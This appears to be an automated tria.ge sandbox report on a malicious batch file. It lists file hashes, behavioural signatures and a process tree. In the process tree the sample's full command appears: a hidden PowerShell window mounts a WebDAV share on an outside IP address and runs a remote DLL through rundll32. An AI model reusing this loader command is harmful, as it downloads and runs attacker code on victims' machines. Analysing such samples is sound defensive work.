Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 06:41
Static task
static1
Behavioral task
behavioral1
Sample
142041243181263946.bat
Resource
win7-20240708-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
142041243181263946.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
142041243181263946.bat
-
Size
2KB
-
MD5
9b5c6d7503e4562515d897894b172d39
-
SHA1
dc66f83505d8fa548298757534652c911fbf33fd
-
SHA256
c61193c14a5c82ee55598e41949fa7fe5b8e5e1e666dad775989bea0c0623c55
-
SHA512
8dd425efe1a01078ed8213760970a76231e9b9ed05254881bf3eeb5e95793fdc6b24889c6551e2666791607c3b1c8d0eddb938b30a8726e4dfc604e9a545f5d9
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1260 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1260 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1228 wordpad.exe 1228 wordpad.exe 1228 wordpad.exe 1228 wordpad.exe 1228 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1056 wrote to memory of 1228 1056 cmd.exe 29 PID 1056 wrote to memory of 1228 1056 cmd.exe 29 PID 1056 wrote to memory of 1228 1056 cmd.exe 29 PID 1056 wrote to memory of 1260 1056 cmd.exe 30 PID 1056 wrote to memory of 1260 1056 cmd.exe 30 PID 1056 wrote to memory of 1260 1056 cmd.exe 30 PID 1260 wrote to memory of 2352 1260 powershell.exe 32 PID 1260 wrote to memory of 2352 1260 powershell.exe 32 PID 1260 wrote to memory of 2352 1260 powershell.exe 32 PID 1260 wrote to memory of 2600 1260 powershell.exe 33 PID 1260 wrote to memory of 2600 1260 powershell.exe 33 PID 1260 wrote to memory of 2600 1260 powershell.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\142041243181263946.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:1228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\233.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2352
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\233.dll entry3⤵PID:2600
-
-